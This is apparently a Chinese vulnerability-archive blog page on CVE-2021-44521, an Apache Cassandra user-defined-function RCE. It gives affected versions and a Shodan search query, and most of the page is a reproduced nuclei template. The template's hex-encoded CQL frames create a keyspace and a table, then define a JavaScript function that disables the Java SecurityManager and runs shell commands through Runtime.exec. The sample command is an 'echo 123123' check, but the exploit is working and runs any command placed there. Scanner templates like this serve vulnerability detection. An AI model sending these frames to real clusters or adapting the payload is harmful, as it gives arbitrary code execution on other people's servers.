Apache Cassandra Load UDF RCE

漏洞信息

漏洞名称: Apache Cassandra Load UDF RCE

漏洞编号:

  • CVE: CVE-2021-44521

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: Apache Cassandra是一个高度可扩展的分布式NoSQL数据库系统,广泛用于处理大量数据的企业级应用中。它支持跨多数据中心的高可用性,是许多大型互联网公司的关键基础设施组件。

该漏洞存在于Apache Cassandra的用户定义函数(UDF)功能中,当配置为启用用户定义函数(enable_user_defined_functions: true)、启用脚本化用户定义函数(enable_scripted_user_defined_functions: true)且禁用用户定义函数线程(enable_user_defined_functions_threads: false)时,攻击者可以通过创建恶意用户定义函数来执行任意代码。此配置被文档化为不安全配置,但此CVE进一步证实了其危险性。

成功利用此漏洞的攻击者可以以Cassandra进程的权限执行任意代码,可能导致受影响系统的完全被控制。攻击者需要具备在集群中创建用户定义函数的足够权限才能利用此漏洞。此漏洞的严重性在于它允许远程代码执行,且无需用户交互,攻击者可以自动化利用此漏洞,对系统安全构成重大威胁。

产品厂商: apache

产品名称: cassandra

影响版本: 3.0.x < version <= 3.0.26, 3.11.x < version <= 3.11.12, 4.0.x < version <= 4.0.2

搜索语法: cpe:”cpe:2.3:a:apache:cassandra”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/3442666f0f77cfb9c0212eb8044484062643effd/network%2Fcves%2F2021%2FCVE-2021-44521.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79

id: CVE-2021-44521

info:
  name: Apache Cassandra Load UDF RCE
  author: Y4er, NaN-KoreLogic
  severity: critical
  description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.'
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the Cassandra process, potentially leading to a complete compromise of the affected system.
  remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2
  reference:
    - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44521
    - https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
    - https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356
    - http://www.openwall.com/lists/oss-security/2022/02/11/4
    - https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2021-44521
    cwe-id: CWE-732,CWE-94
    epss-score: 0.91865
    epss-percentile: 0.99680
    cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: cassandra
    shodan-query: cpe:"cpe:2.3:a:apache:cassandra"
  tags: cve,cve2021,network,rce,apache,cassandra,tcp
tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"
    inputs:
      - data: "050000000500000000"
        type: hex
        read: 1024

      - data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35"
        type: hex
        read: 1024

      - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
        type: hex
        read: 1024

      - data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b"
        type: hex
        read: 1024

      - data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510"
        type: hex
        read: 1024

      - data: "1c030291ff34050000100700000313000002fb637265617465206f72207265706c6163652046554e4354494f4e20746573742e657865632820636d64207465787420290d0a2020202052455455524e53204e554c4c204f4e204e554c4c20494e5055540d0a2020202052455455524e5320746578740d0a202020204c414e4755414745206a6176617363726970740d0a2020202041532024240d0a202020207661722053797374656d203d204a6176612e7479706528226a6176612e6c616e672e53797374656d22293b53797374656d2e73657453656375726974794d616e61676572286e756c6c293b0d0a202020207661722065203d746869732e656e67696e652e666163746f72792e736372697074456e67696e652e6576616c2827766172206f736e616d65203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226f732e6e616d6522293b6f736e616d65203d206f736e616d652e746f4c6f7765724361736528293b7661722073706c6974203d206f736e616d652e73746172747357697468282277696e2229203f20222f6322203a20222d63223b76617220636d6450617468203d206f736e616d652e73746172747357697468282277696e2229203f2022636d6422203a202262617368223b76617220636f6d6d616e64203d2022272b636d642b27223b7661722073203d205b636d64506174682c2073706c69742c20636f6d6d616e645d3b70203d206a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632873293b766172206272203d206e6577206a6176612e696f2e4275666665726564526561646572286e6577206a6176612e696f2e496e70757453747265616d52656164657228702e676574496e70757453747265616d282929293b766172207265733d22223b7768696c652028286c203d2062722e726561644c696e6528292920213d206e756c6c29207b202020207265732b3d6c3b7265732b3d6a6176612e6c616e672e53797374656d2e6c696e65536570617261746f7228293b7d27293b0d0a20202020653b0d0a2020202024243b0001000000340000006400080005d82cc8cc7ece89646c85"
        type: hex
        read: 1024

      - data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e"
        type: hex
        read: 1024

      - data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281"
        type: hex
        read: 1024

      - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
        type: hex
        read: 1024
    matchers:
      - type: word
        part: raw
        words:
          - "123123"
# digest: 4a0a00473045022100d0837ea19e76ae9fbddc08aea0ca103b39a3a004d0187d46bd75cc9f605c75fd022040ec326b0cfefa5b5ac2b13274061045378dc958a1eaf77b97aa3b57a4456a75:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
Apache Cassandra Load UDF RCE
http://example.com/2025/07/06/github_2193064422/
作者
lianccc
发布于
2025年7月6日
许可协议